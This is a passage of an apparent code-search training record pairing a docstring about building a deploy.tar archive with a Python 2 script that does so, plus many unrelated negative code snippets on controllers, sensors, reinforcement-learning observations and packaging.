self.ITerm) + (self.Td * self.DTerm))\r\n\t\texcept ZeroDivisionError:\r\n\t\t\tu = self.Kp * (error + (0.0 * self.ITerm) + (self.Td * self.DTerm))\r\n\t\t\t\t\r\n\t\t# Bound the controller output if necessary (between MinValue - MaxValue) \r\n\t\tif u > self.MaxValue:\r\n\t\t\tself.OutputValue = self.MaxValue\r\n\t\t\tself.ITerm -= error * delta_time \t# Back-calculate the integral error\r\n\t\telif u < self.MinValue:\r\n\t\t\tself.OutputValue = self.MinValue\r\n\t\t\tself.ITerm -= error * delta_time \t# Back-calculate the integral error\r\n\t\telse:\r\n\t\t\tself.OutputValue = 
u\r\n\t\t\r\n\t\t# Update the last output value\r\n\t\tself.last_OutputValue = self.OutputValue\r\n\t\t\r\n\t\t# Record state, error, y(t), and sample time values\r\n\t\tself.state_history.append(state_value)\r\n\t\tself.error_history.append(error)\r\n\t\tself.output_history.append(self.OutputValue)\r\n\t\tself.sample_times.append(current_time/1000)\t\t# Convert from msec to sec\r\n\t\t\r\n\t\t# Return controller output\r\n\t\treturn self.OutputValue", "def update(self):\n self._ba_attrs = self._api.get_current_data_point(self._ba_uuid)\n self._state = self._ba_attrs[\"temperature\"]", "def update(self):\n self.value = self.sensor.update()", "def _get_observation(self, observation):", "def update(self):\n if self.temperature != None and self.humidity != None:\n self.sensor.set_environmental_data(self.humidity, self.temperature)\n# Trim away error values.\n new_eco2 = self.sensor.eco2\n if new_eco2 < 65535:\n self.eco2 = new_eco2\n self.tvoc = self.sensor.tvoc", "def observe(self, observation):\n # shallow copy observation (deep copy can be expensive)\n obs = observation.copy()\n batch_idx = self.opt.get('batchindex', 0)\n self.observation = obs\n #self.answers[batch_idx] = None\n return obs", "def update_state(self):\n self.last_position = self.current_position\n self.last_distance = self.current_distance\n self.last_collision_time_stamp = self.current_collision_time_stamp\n self.current_kinematics = self.airsim_client.simGetGroundTruthKinematics(vehicle_name=self.drone_name)\n self.current_position = self.current_kinematics.position + self.base_offset\n self.current_collision_time_stamp = self.airsim_client.simGetCollisionInfo(vehicle_name=self.drone_name).time_stamp\n # print(\"DEBUG: simGetCollisionInfo:\", self.airsim_client.simGetCollisionInfo(vehicle_name=self.drone_name))\n # self.pending_death = self.airsim_client.simIsRacerDisqualified(vehicle_name=self.drone_name)\n self.objective_status = self.current_objective.next_gate_status(self.last_position, self.current_position)\n if self.objective_status == GateStatus.CROSSED or self.objective_status == GateStatus.PASSED:\n if self.switch_to_next_objective(): # if track is finished (changes self.last_distance)\n self.track_complete = True\n self.current_distance = self.current_position.distance_to(self.current_objective.gate_pose.position)", "def getObservation(self):\n return self._cur_state", "def update(self, obs, shared):\n self._last_obs[shared['env'].timestamp % IdleTracker._MINIMAP_IDLE_STEPS] = obs\n\n if self._idle_units_map is None:\n self._idle_units_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))\n if self._blacklist_map is None:\n self._blacklist_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))\n\n self._update_idle_units_map(obs, shared)\n self._update_blacklist_map(obs, shared)", "def update(self, state_value, current_time):\r\n\t\t\r\n\t\t# Calculate Error - if SetPoint > 0.0, then normalize error with respect to setpoint\r\n\t\tif self.SetPoint==0.0:\r\n\t\t\terror = state_value - self.SetPoint\r\n\t\telse:\r\n\t\t\terror = (state_value - self.SetPoint)/self.SetPoint \r\n\t\t\r\n\t\t# Bound the controller output (between MinValue - MaxValue)\r\n\t\tif self.ConstantValue > self.MaxValue:\r\n\t\t\tself.OutputValue = self.MaxValue\r\n\t\telif self.ConstantValue < self.MinValue:\r\n\t\t\tself.OutputValue = self.MinValue\r\n\t\telse:\r\n\t\t\tself.OutputValue = self.ConstantValue\r\n\t\t\r\n\t\t# Record state, error and sample time 
values\r\n\t\tself.state_history.append(state_value)\r\n\t\tself.error_history.append(error)\r\n\t\tself.output_history.append(self.OutputValue)\r\n\t\tself.sample_times.append(current_time/1000)\t\t\t# Convert from msec to sec\r\n\t\t\r\n\t\treturn self.OutputValue", "def receive_observation(self):\n # States are received within the same send_command cycle, i.e. within\n # self.apply_action(). Here we just use the last received robot state to\n # update the animated robot within PyBullet, and update some internal\n # variables.\n# super()._reset_base_pose(self.base_position,\n# self.base_orientation_quaternion)\n\n #joint_angles_dict = dict(zip(self._motor_id_dict.keys(), self.motor_angles))\n #super()._reset_joint_angles(joint_angles_dict)\n self._get_state()", "def _get_observation(self):\n di = super()._get_observation()\n\n # low-level object information\n if self.use_object_obs:\n # Get robot prefix\n if self.env_configuration == \"bimanual\":\n pr0 = self.robots[0].robot_model.naming_prefix + \"left_\"\n pr1 = self.robots[0].robot_model.naming_prefix + \"right_\"\n else:\n pr0 = self.robots[0].robot_model.naming_prefix\n pr1 = self.robots[1].robot_model.naming_prefix\n\n # position and rotation of object\n cube_pos = np.array(self.sim.data.body_xpos[self.cube_body_id])\n cube_quat = T.convert_quat(\n self.sim.data.body_xquat[self.cube_body_id], to=\"xyzw\"\n )\n di[\"cube_pos\"] = cube_pos\n di[\"cube_quat\"] = cube_quat\n\n di[pr0 + \"eef_xpos\"] = self._eef0_xpos\n di[pr1 + \"eef_xpos\"] = self._eef1_xpos\n di[\"handle_0_xpos\"] = np.array(self._handle_0_xpos)\n di[\"handle_1_xpos\"] = np.array(self._handle_1_xpos)\n di[pr0 + \"gripper_to_handle\"] = np.array(self._gripper_0_to_handle)\n di[pr1 + \"gripper_to_handle\"] = np.array(self._gripper_1_to_handle)\n\n di[\"object-state\"] = np.concatenate(\n [\n di[\"cube_pos\"],\n di[\"cube_quat\"],\n di[pr0 + \"eef_xpos\"],\n di[pr1 + \"eef_xpos\"],\n di[\"handle_0_xpos\"],\n di[\"handle_1_xpos\"],\n di[pr0 + \"gripper_to_handle\"],\n di[pr1 + \"gripper_to_handle\"],\n ]\n )\n\n return di", "def tell(self, observation):\n self.time += 1\n new_distribution = [0] * self.num_states\n for s1 in range(self.num_states):\n sensor_term = self.sensor_model(observation, s1)\n prior = 0\n for s0 in range(self.num_states):\n prior += self.transition_model(s0, s1) * self.distribution[s0]\n new_distribution[s1] = sensor_term * prior\n\n self.distribution = new_distribution\n self.distribution = [x / float(sum(self.distribution)) for x in self.distribution]", "def observe_Env(self, mode='all'):\r\n L_cnt, R_cnt, bump,DLightBump, AnalogBump,Infra_Omi, Infra_L, Infra_R = self.achieve_data(mode)\r\n old_state = self.real_state.copy()\r\n\r\n if mode != 'e':\r\n # Check if current state is terminal\r\n terminal,obs = self.check_terminal(bump,DLightBump, AnalogBump,(Infra_Omi, Infra_L, Infra_R))\r\n # update list of obstacles\r\n # maximum count for determining if the obstacle 100% exists\r\n max_cnt =5.0\r\n for o in obs:\r\n # if obstacle is not detected before\r\n if self.obs_ls[0].count(o)<1:\r\n self.obs_ls[0].append(o)\r\n self.obs_ls[1].append(1/max_cnt)\r\n else:\r\n # update probability of this obstacle observed\r\n self.obs_ls[1][self.obs_ls[0].index(o)] += 1.0/max_cnt\r\n\r\n # The reward is the reward obtained after transition (s,a,s')\r\n r = self.cal_reward(bump, DLightBump, AnalogBump,(Infra_Omi, Infra_L, Infra_R))\r\n else:\r\n # if encoder mode, return encoder info only, without calculate rewards and terminals\r\n r= 0\r\n terminal 
=False\r\n\r\n # obtain postion and heading angle\r\n self.real_state[0],self.real_state[1],self.real_state[2] = self.Motion.get_CurPos(L_cnt,R_cnt)\r\n\r\n return old_state, self.real_state,r, terminal, (L_cnt, R_cnt, bump,DLightBump, AnalogBump)", "def value(self, observation, prev_action, prev_reward):\n agent_inputs = buffer_to((observation, prev_action, prev_reward),\n device=self.device)\n _mu, _log_std, value, _rnn_state = self.model(*agent_inputs, self.prev_rnn_state)\n return value.to(\"cpu\")", "def _reset(self):\n self.obs_buffer.clear()\n obs = self._convert(self.env.reset())\n self.buffer.clear()\n self.counter = 0\n for _ in range(self.n - 1):\n self.buffer.append(np.zeros_like(obs))\n self.buffer.append(obs)\n obsNew = np.stack(self.buffer, axis=self.ch_axis)\n return obsNew.astype(np.float32) * self.scale", "def _update_loc(self) -> None:\n self.state[:, :, Boids.Attr.LOC] += self.state[:, :, Boids.Attr.VEL]\n # wrap-around the simulated environment\n self.state[:, :, Boids.Attr.LOC] %= np.expand_dims(self.env_bounds, axis=1)", "def update(self):\n self._client.update()\n\n self._current_operation_mode = self._device.get_run_mode()\n self._target_temperature = self._device.target_temperature\n self._current_temperature = self._device.current_temperature\n self._min_temp = self._device.min_temp\n self._max_temp = self._device.max_temp\n\n self._update_attributes_from_device()\n\n # set whether device is in away mode\n if (\n self._current_operation_mode == CONST_MODE_AWAY\n or self._current_operation_mode == CONST_MODE_FROST\n ):\n self._away = True\n else:\n self._away = False\n\n # set whether device is on/off\n if self._current_operation_mode == CONST_MODE_OFF:\n self._on = False\n else:\n self._on = True", "def update(self, state_value, current_time):\r\n\t\t\r\n\t\t# Calculate Error - if SetPoint > 0.0, then normalize error with respect to setpoint\r\n\t\tif self.SetPoint==0.0:\r\n\t\t\terror = state_value - self.SetPoint\r\n\t\t\tincrement = 0.0\r\n\t\telse:\r\n\t\t\terror = (state_value - self.SetPoint)/self.SetPoint \r\n\t\t\tif error > 0.0:\r\n\t\t\t\tincrement = self.OutputValueIncrement\r\n\t\t\telse:\r\n\t\t\t\tincrement = -self.OutputValueIncrement\r\n\t\t\r\n\t\t# Bound the controller output (between MinValue - MaxValue)\r\n\t\tif self.LastOutputValue+increment > self.MaxValue:\r\n\t\t\tself.OutputValue = self.MaxValue\r\n\t\telif self.LastOutputValue+increment < self.MinValue:\r\n\t\t\tself.OutputValue = self.MinValue\r\n\t\telse:\r\n\t\t\tself.OutputValue = self.LastOutputValue+increment\r\n\t\t\r\n\t\t# Record state, error and sample time values\r\n\t\tself.state_history.append(state_value)\r\n\t\tself.error_history.append(error)\r\n\t\tself.output_history.append(self.OutputValue)\r\n\t\tself.sample_times.append(current_time/1000)\t\t\t# Convert from msec to sec\r\n\t\t\r\n\t\tself.LastOutputValue = self.OutputValue\r\n\t\t\r\n\t\treturn self.OutputValue", "def _update(self, bandit): \n \n bandit_logs = self.logging[bandit]\n bandit = bandit.id\n if not bandit_logs['actions']:\n estimate = 0 # if not taken till now then 0 is assigned\n actions = 0\n else:\n estimate = bandit_logs['reward'] / bandit_logs['actions'] # if not assigned\n actions = bandit_logs['actions']\n self.mu[bandit] = (self.mu_pri[bandit]/self.var_pri[bandit] + actions*estimate/self.var0)/(actions/self.var0 + 1/self.var_pri[bandit])\n self.var[bandit] = 1/(actions/self.var0 + 1/self.var[bandit])", "def get_observation(self):\n # Check if there is an observation pending\n if 
self.observation_pending:\n raise RuntimeError(\"There is already a pending observation. \"\n \"The pending observation has to be answered first\")\n # Set pending observation to true\n self.observation_pending = True\n # Get the current environment\n obs = self.__gen_observation(self.current_player, roll_dice=True)\n\n # Add the bord and dice before the move to the history\n self.__add_to_hist()\n return obs, self.current_player", "def value(self, observation, prev_action, prev_reward):\n model_inputs = buffer_to((observation, prev_action, prev_reward),\n device=self.device)\n _mu, _log_std, value = self.model(*model_inputs)\n return value.to(\"cpu\")", "def update(self):\n\n obstVals = self.robot.getDepth(self.startCol, self.startRow,\n self.sampleWidth, self.sampleHeight)\n\n masked_obstVals = numpy.ma.masked_array(obstVals, obstVals == 0)\n\n if numpy.ma.count(masked_obstVals) == 0:\n meanDistance = 500\n else:\n meanDistance = numpy.mean(masked_obstVals)\n if meanDistance < 500:\n meanDistance = 500\n\n if meanDistance < 1200: # Changing this value will change how sensitive robot is to walls\n self.setVector(self.speedMult / meanDistance, 180 - self.angle)\n else:\n self.setVector(0.0, 0.0)" ]
[ "0.614435", "0.6122056", "0.5907372", "0.5907372", "0.57816315", "0.5757078", "0.5697894", "0.56669545", "0.56475073", "0.5640076", "0.5546796", "0.55234987", "0.55183667", "0.5510763", "0.5506494", "0.5496655", "0.5493527", "0.5485058", "0.5471934", "0.54646724", "0.5458043", "0.5446013", "0.5427273", "0.54177433", "0.5404561", "0.53833807", "0.5380111", "0.5331171", "0.53199023", "0.53156495" ]
0.6410189
0
Main entry point into the program. Checks that everything is in order, and then creates the tar file to deploy. None. None. None. None.
def main():
    print "Starting tar-maker script.."
    # String of files we're going to be looking for
    files="runlocaltests.py testprocess.py verifyfiles.mix cleanup_deploy.py hashes.dict upgrade_nodes.sh deploy_helper.py"
    # TODO: add list of 'optional files' to include
    # get the files passed in as arguments
    files_from_args = ''
    # 1 skips this file name
    print
    for eachfile in range(1, len(sys.argv)):
        print "Adding custom file: "+sys.argv[eachfile]
        files_from_args+=' '+sys.argv[eachfile]
    print
    # mash the two strings together now
    files+=files_from_args
    # Total number of files split by spaces
    total_files=len(files.split(' '))
    # Counter for found files
    num_files_found=0
    # Temporary tar, incrementally we'll build it up
    # Will remove the temp files (since I use -update flag)
    # for building up the .tar
    if os.path.isfile('./deploy.tar.temp'):
        os.remove('./deploy.tar.temp')
    for filename in files.split(' '):
        print ' Looking for '+filename+' in '+os.getcwd()
        if os.path.isfile('./'+filename):
            print ' File found!'
            num_files_found += 1
            shellexec('tar -rf deploy.tar.temp '+filename)
        else:
            print ' WARNING: '+filename+' NOT FOUND'
    print
    print "Found "+str(num_files_found)+" of "+str(total_files)+" necessary files."
    print
    # Did we find all of the files?
    if num_files_found == total_files:
        print
        print 'All files found, finishing tar..'
        # rename the file to the final name.
        # this will over-write current deploy.tar in the dir if one exists
        shellexec('mv deploy.tar.temp deploy.tar')
        return 0
    else:
        print 'FATAL ERROR: Not all the files were found, please check that '
        print ' this script is in the same directory as the files. '
        print
        print "Cleaning up temp files..."
        # remove deploy.tar.temp only if it exists.
        if os.path.isfile('./deploy.tar.temp'):
            os.remove('./deploy.tar.temp')
        print
        print 'Finished (with errors)'
        return 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():\n parser = argparse.ArgumentParser(description='Create packaged set of modulefiles for deployment on OASIS.')\n parser.add_argument('--location', dest='location', default=None,\n help='Location directory to place files in')\n parser.add_argument('--tarfile', dest='tarfile', default=None,\n help='Name of tarfile to generate')\n args = parser.parse_args(sys.argv[1:])\n if args.location is None:\n args.location = tempfile.mkdtemp()\n elif os.path.exists(args.location):\n overwrite = raw_input(\"{0} exists, overwrite? \".format(args.location))\n if overwrite.lower().strip() != 'y':\n sys.stderr.write(\"Exiting...\")\n sys.exit(0)\n shutil.rmtree(args.location)\n os.mkdir(args.location)\n else:\n os.mkdir(args.location)\n location = checkout_repo(args.location) \n if location is None:\n sys.stderr.write(\"Can't checkout modulefiles to {0}!\\n\".format(args.location))\n package_files(location)\n if args.tarfile is None:\n args.tarfile = \"/tmp/moduleupdate.tar.gz\"\n if tar_files(location, args.tarfile) is None:\n sys.stderr.write(\"Error generating tarfile, exiting\\n\")\n sys.exit(1)\n shutil.rmtree(location)\n sys.stdout.write(\"Packaged files located at {0}\\n\".format(args.tarfile))", "def deploy():\n archive_path = do_pack()\n if archive_path is None:\n print(\"pass\")\n return False\n return do_deploy(archive_path)", "def deploy():\n myfile = do_pack()\n if myfile is None:\n return False\n return do_deploy(myfile)", "def main():\n with open('config.json') as config_file:\n configs = json.load(config_file)\n\n jar_list = utilities.upload_jars(configs)\n utilities.sign_jars(configs)\n\n artifact_folder = utilities.prepare_artifacts(configs, jar_list)\n\n repo_id = utilities.create_staging_repo(configs)\n utilities.deploy_to_staging_repo(configs, artifact_folder, repo_id)\n utilities.close_staging_repo(configs, repo_id)", "def deploy():\n filepath = do_pack()\n if (filepath is None):\n return False\n return do_deploy(filepath)", "def deploy():", "def deploy():\n build()\n copy()\n install()", "def deploy():\n new_archive = do_pack()\n\n if new_archive is None:\n return False\n\n res = do_deploy(new_archive)\n return res", "def deploy():\n comp = do_pack()\n\n if (not comp):\n return False\n return do_deploy(comp)", "def deploy():\n packing = do_pack()\n if packing is False:\n return False\n\n return do_deploy(packing)", "def deploy():\n archive_path = do_pack()\n if archive_path is False:\n return false\n\n deploy_return = do_deploy(archive_path)\n return deploy_return", "def create_deployment_package(self):\n try:\n self.ensure_build_dir()\n except BaseException as be:\n logging.error('Failed to ensure an empty build dir')\n raise be\n\n # Build dir exists (or existed as of the last check)\n #\n # Copy script to build dir.\n # - On fail, tear down build dir\n try:\n self.copy_script()\n except BaseException as be:\n logging.error('Failed to copy script, {script}, to build dir'.format(script=self.script_file))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n print('Deleting build dir failed.')\n raise be\n\n # Copy rkstr8 project to build dir.\n # - On fail, tear down build dir\n try:\n self.copy_rkstr8()\n except BaseException as be:\n logging.error('Failed to copy script, {script}, to build dir'.format(script=self.script_file))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n print('Deleting build dir failed.')\n raise be\n\n try:\n self.install_requirements()\n except 
BaseException as be:\n logging.error('Failed to copy script, {script}, to build dir'.format(script=self.script_file))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n print('Deleting build dir failed.')\n raise be\n\n try:\n self.zip_build_dir()\n except BaseException as be:\n logging.error(\n 'Failed to create zip file, {zip}, to from build dir, {dir}'.format(zip=self.deployment_zip,\n dir=self.build_dir))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n logging.error('Deleting build dir failed.')\n raise be", "def deploy():\n return do_deploy(do_pack())", "def deploy():\n return do_deploy(do_pack())", "def deploy():\n return do_deploy(do_pack())", "def deploy():\n build()\n collect()\n commit()\n push()", "def deploy():\n require('hosts', provided_by=[prod])\n require('whole_path', provided_by=[prod])\n require('code_root')\n upload_tar_from_git(env.whole_path)\n install_requirements()\n symlink_current_release()\n migrate()\n restart_webservers()\n setup_permissions()\n collectstatic()", "def deploy(ctx):\n click.echo('deploying')\n ctx.deploy()\n click.echo('done')", "def package(target, source, env):\n\n # Print out.\n print('')\n print(\"#######################\")\n print(\"# Packaging the files #\")\n print(\"#######################\")\n\n # List of distribution files.\n type_list = [env['DIST_TYPE']]\n if type_list[0] == 'ALL':\n type_list = ['zip', 'tar']\n\n # Loop over the distribution files.\n for dist_type in type_list:\n # The file name.\n if dist_type == 'zip':\n file = env['DIST_FILE'] + '.zip'\n elif dist_type == 'tar':\n file = env['DIST_FILE'] + '.tar.bz2'\n elif dist_type == 'dmg':\n file = env['DIST_FILE'] + '.dmg'\n\n # Print out.\n print(\"\\n\\nCreating the package distribution \" + repr(file) + \".\\n\")\n\n # Create the special Mac OS X DMG file and then stop execution.\n if dist_type == 'dmg':\n # Create the Mac OS X universal application.\n print(\"\\n# Creating the Mac OS X universal application.\\n\\n\")\n cmd = '%s setup.py py2app' % sys.executable\n print(\"%s\\n\" % cmd)\n pipe = Popen(cmd, shell=True, stdin=PIPE, close_fds=False)\n waitpid(pipe.pid, 0)\n\n # Create the dmg image.\n print(\"\\n\\n# Creating the DMG image.\\n\\n\")\n cmd = 'hdiutil create -ov -fs HFS+ -volname \"relax\" -srcfolder dist/relax.app ../%s' % file\n print(\"%s\\n\" % cmd)\n pipe = Popen(cmd, shell=True, stdin=PIPE, close_fds=False)\n waitpid(pipe.pid, 0)\n\n # Stop executing.\n return\n\n # Open the Zip distribution file.\n if dist_type == 'zip':\n archive = ZipFile(path.pardir + path.sep + file, 'w', compression=8)\n\n # Open the Tar distribution file.\n elif dist_type == 'tar':\n if search('.bz2$', file):\n archive = TarFile.bz2open(path.pardir + path.sep + file, 'w')\n elif search('.gz$', file):\n archive = TarFile.gzopen(path.pardir + path.sep + file, 'w')\n else:\n archive = TarFile.open(path.pardir + path.sep + file, 'w')\n\n # Base directory.\n base = getcwd() + sep\n\n # Walk through the directories.\n for root, dirs, files in walk(getcwd()):\n # Skip the subversion directories.\n if search(\"\\.svn\", root):\n continue\n\n # Add the files in the current directory to the archive.\n for i in range(len(files)):\n # Skip any '.sconsign' files, hidden files, byte-compiled '*.pyc' files, or binary objects '.o', '.os', 'obj', 'lib', and 'exp'.\n if search(\"\\.sconsign\", files[i]) or search(\"^\\.\", files[i]) or search(\"\\.pyc$\", files[i]) or search(\"\\.o$\", files[i]) 
or search(\"\\.os$\", files[i]) or search(\"\\.obj$\", files[i]) or search(\"\\.lib$\", files[i]) or search(\"\\.exp$\", files[i]):\n continue\n\n # Create the file name (without the base directory).\n name = path.join(root, files[i])\n name = name[len(base):]\n print('relax-' + version + path.sep + name)\n\n # The archive file name.\n arcname = 'relax-' + version + path.sep + name\n\n # Zip archives.\n if dist_type == 'zip':\n archive.write(filename=name, arcname=arcname)\n\n # Tar archives.\n if dist_type == 'tar':\n archive.add(name=name, arcname=arcname)\n\n # Close the archive.\n archive.close()\n\n # Final printout.\n print(\"\\n\\n\\n\")", "def deploy():\n\n archive_path = do_pack()\n\n if archive_path is None:\n return False\n\n return do_deploy(archive_path)", "def deploy():\n archive_path = do_pack()\n\n if not archive_path:\n return False\n\n return do_deploy(archive_path)", "def deploy():\n try:\n archive_path = do_pack()\n did_deploy = do_deploy(archive_path)\n return did_deploy\n except:\n return False", "def deploy():\n\n project_dir = '/home/gastosabertos/gastos_abertos_website'\n with cd(project_dir):\n local('tar -cvzf build.tar.gz build')\n run('cp -r build build-old')\n put('build.tar.gz', '.')\n run('tar -xvf build.tar.gz')", "def full_deploy():\n refresh_cts()\n push_mockups()\n deploy()", "def do_pack():\n time_test = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n file_name = \"versions/web_static_\" + time_test + \".tgz\"\n command1 = \"mkdir -p versions\"\n command2 = \"tar -czvf \" + file_name + \" web_static\"\n local(command1)\n com = local(command2)\n if com.return_code == 0:\n return file_name\n else:\n return None", "def do_pack():\n now = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n local('mkdir -p versions')\n result = local('tar -czvf versions/web_static_{}.tgz web_static'\n .format(now))\n if result.failed:\n return None\n else:\n return result", "def task_deploy():\n client = boto3.client(\"lambda\")\n\n def upload_build():\n if function_exists(client):\n update_lambda_function(client)\n else:\n create_lambda_function(client)\n\n return {\"actions\": [upload_build], \"file_dep\": [f\"{DIST_DIR}/build.zip\"]}", "def main():\n args = cli()\n\n title = ' [%s] ***' % PROG\n print('*' * (80 - len(title)) + title)\n print(' Remote Hosts : %s' % (' -> '.join(args.hosts)))\n print(' Local Path : %s' % args.local)\n print(' Remote Path : %s' % args.remote)\n print(' Upload Files : %s' % args.upload_files)\n print('Download Files : %s' % args.download_files)\n print(' Action : %s' % args.action)\n print(' Ignored Dirs : %s' % args.ignore_dirs)\n print(' Ignored Files : %s' % args.ignore_files)\n print('*' * 80)\n\n if args.test:\n return\n\n if args.ignore_dirs:\n not_match_dir = '(.*/)?(%s)/.*' % ('|'.join([re.escape(i) for i in args.ignore_dirs]))\n else:\n not_match_dir = None\n\n if args.ignore_files:\n not_match_file = '.*/(%s)' % ('|'.join([re.escape(i) for i in args.ignore_files]))\n else:\n not_match_file = None\n\n not_match = '(%s)' % ('|'.join(['(%s)' % i for i in [not_match_dir, not_match_file, args.ignore] if i]))\n print('Ignore: %r' % not_match)\n\n chain = build_chain(args.hosts)\n try:\n ignore_patterns = []\n ssh_deploy.main(chain, args.local, args.remote, action=args.action,\n files_upload=args.upload_files, ignore_patterns=ignore_patterns,\n files_download=args.download_files,\n not_match=not_match)\n except Exception as error:\n LOG.exception('Uncaught Exception: %s', error)\n finally:\n chain.close()", "def main():\n\n if not 
os.environ.get('TRAVIS_PULL_REQUEST', 'false') == 'false':\n return\n\n git_config_setup()\n populate_source()\n build_and_deploy()", "def deploy():\n require(\"hosts\", provided_by=[production, staging])\n env.release = time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n upload_tar_from_git()\n install_requirements()\n setup_webserver()\n symlink_current_release()\n restart_webserver()" ]
[ "0.7674628", "0.7009183", "0.69814724", "0.6909496", "0.67717195", "0.67605096", "0.6690661", "0.6664085", "0.6589862", "0.65550286", "0.65225005", "0.6473202", "0.64672995", "0.64672995", "0.64672995", "0.64645517", "0.6382354", "0.63811666", "0.63648045", "0.6364746", "0.6338002", "0.6303981", "0.6286637", "0.6281648", "0.62753373", "0.6272629", "0.6243884", "0.6230276", "0.6191687", "0.6173495" ]
0.77710694
0
Methods decorated with notify_wrap make a copy of the list before the operation, then notify observers of the change after. The list itself, the old list, and the new list are sent as arguments.
def notify_wrap(self, func, *args, **kw):
    val = func(self, *args, **kw)
    if not self._observable_frozen:
        self.notify('list', None, self)
    return val
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_list_inplace_update(self):\r\n vm = List.value_manager(None, None, [1,2,3])\r\n assert not vm.changed\r\n vm.value.append(4)\r\n assert vm.changed", "def change(some_list):\n some_list[0] = 'Changed' # will change the original list", "def update_cloud_watch_obj_list(old_list, new_list):\n\n # Add new.\n for new_item in new_list:\n if new_item not in old_list:\n new_item.added = True\n old_list.append(new_item)\n\n # Remove deleted.\n for old_item in old_list:\n if old_item not in new_list:\n old_list.remove(old_item)\n\n return old_list", "def test_list_update(self):\r\n vm = List.value_manager(None, None, [1,2,3])\r\n assert not vm.changed\r\n vm.value = [4,5,6]\r\n assert vm.changed", "def change_history(self, new_reflist, modification_msg):\n self.visual.log(\"New reference list wrt: [{}], yielded {} items.\".format(modification_msg, len(new_reflist)))\n self.push_reference_list(new_reflist, modification_msg)\n # unselect stuff -- it's meaningless now\n self.unselect()", "def handle_list_items(self, object, name, old, new):\n self.handle_list(object, name, new.removed, new.added)", "def handle_list(self, object, name, old, new):\n raise NotImplementedError", "def changeme(mylist2): # create function changeme using parameters mylist2\n mylist2 = [1, 2, 3, 4] # This would assign new reference in mylist\n print(\"Values inside the function: \", mylist2) # print the new value of mylist2\n return", "def _update_proxy(self, change):\n # The superclass implementation is sufficient.\n super(ListView, self)._update_proxy(change)", "def handle_list(self, object, name, old, new):\n if old is not None and old is not Uninitialized:\n unregister = self.next.unregister\n for obj in old:\n unregister(obj)\n\n register = self.next.register\n for obj in new:\n register(obj)", "def mutate_list(alist):\n alist.append(42)", "def handle_list_items(self, object, name, old, new):\n raise NotImplementedError", "def copy_list(self,list_):\r\n return list_[:]", "def mutate_list_2(lst):\r\n elem = lst[0]\r\n lst.remove(elem)\r\n lst.append(elem)\r\n return lst", "def updateList(self):\n for state in list_:\n state.update(True)", "def handle_list_items_special(self, object, name, old, new):\n wh = self.wrapped_handler_ref()\n if wh is not None:\n wh(object, name, new.removed, new.added)", "def ref_ex1():\n\n print(\"Look Alikes\")\n print(\"===========\")\n\n lst1 = [7, 3, 2]\n lst2 = [7, 3, 2]\n print(lst1, lst2)\n\n lst1[1] = -8\n print(lst1, lst2)\n\n print(\"\")\n print(\"Aliases\")\n print(\"=======\")\n\n lst3 = [1, 5, 9]\n lst4 = lst3\n print(lst3, lst4)\n\n lst3[1] = 17\n print(lst3, lst4)\n\n print(\"\")\n print(\"Copies\")\n print(\"======\")\n\n lst5 = [8, 9, 4]\n # This makes a shallow copy\n lst6 = list(lst5)\n print(lst5, lst6)\n\n lst5[1] = -2\n print(lst5, lst6)\n\n print(\"\")\n print(\"Function Arguments\")\n print(\"==================\")\n\n\n lst7 = [1, 2, 3]\n print(lst7)\n mutate_list(lst7)\n print(lst7)\n return 0", "def notifyObservers(self):", "def test_partial_updates(self):\r\n final = range(10)\r\n initial = final[3:7]\r\n m1 = TestListModel.create(int_list=initial)\r\n\r\n m1.int_list = final\r\n m1.save()\r\n\r\n m2 = TestListModel.get(partition=m1.partition)\r\n assert list(m2.int_list) == final", "def changeme(mylist): # create function mylist with arguments of mylist\n mylist.append([1, 2, 3, 4]) # append(add on to the end) [1, 2, 3, 4] to mylist\n print(\"Values inside the function: \", mylist) # print the altered values of mylist\n return # exit out of the function and 
go back to the outside code", "def test_list(self):\n event_cache = []\n\n class A(HasTraits):\n x = EventfulList([c for c in 'abc'])\n a = A()\n a.x.on_events(lambda i, x: event_cache.append('insert'), \\\n lambda i, x: event_cache.append('set'), \\\n lambda i: event_cache.append('del'), \\\n lambda: event_cache.append('reverse'), \\\n lambda *p, **k: event_cache.append('sort'))\n\n a.x.remove('c')\n # ab\n a.x.insert(0, 'z')\n # zab\n del a.x[1]\n # zb\n a.x.reverse()\n # bz \n a.x[1] = 'o'\n # bo\n a.x.append('a')\n # boa\n a.x.sort()\n # abo\n\n # Were the correct events captured?\n self.assertEqual(event_cache, ['del', 'insert', 'del', 'reverse', 'set', 'set', 'sort'])\n\n # Is the output correct?\n self.assertEqual(a.x, [c for c in 'abo'])", "def testNotifyWithValidListDate(self):\r\n self.assertEqual(self.view.notify(self.mockViews, []), None)", "def svn_changelist_invoke_receiver(svn_changelist_receiver_t__obj, void_baton, char_path, char_changelist, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def updateList(self):\n self._recreateJobs()", "def notify(self, arg=None):\n for observer in self._observers:\n observer.notify(arg)", "def _list_changed_handler ( self, name, old, new ):\n arg_lists = self._get_instance_handlers( name )\n\n for item in old:\n for args in arg_lists:\n item.on_trait_change( remove = True, *args )\n\n for item in new:\n for args in arg_lists:\n item.on_trait_change( *args )", "def reconcile_list(host: Component, key: str, old: List, new: List) -> List:\n zipped = zip_longest(old, new, fillvalue=None)\n reconciled_list = [\n reconcile(host, key, ndx, old_item, new_item)\n for ndx, (old_item, new_item) in enumerate(zipped)\n ]\n return [r for r in reconciled_list if r is not None]", "def update_list_view(self):\n self.model.dataChanged.emit(self.model.index(0, 1),\n self.model.index(len(self.model.data_list), 1))\n #self.pBar.setValue(localization.localizationProgress() * 100)", "def push_addr_reservation_list(self, lst_new):\n self.__not_implemented()", "def test_update_list_changes_data(qtbot):\n # Given\n model = SourcesModel()\n assert model.rowCount() == 0\n\n sources = []\n source = Source(\"I001\", \"Test\", \"Person\", 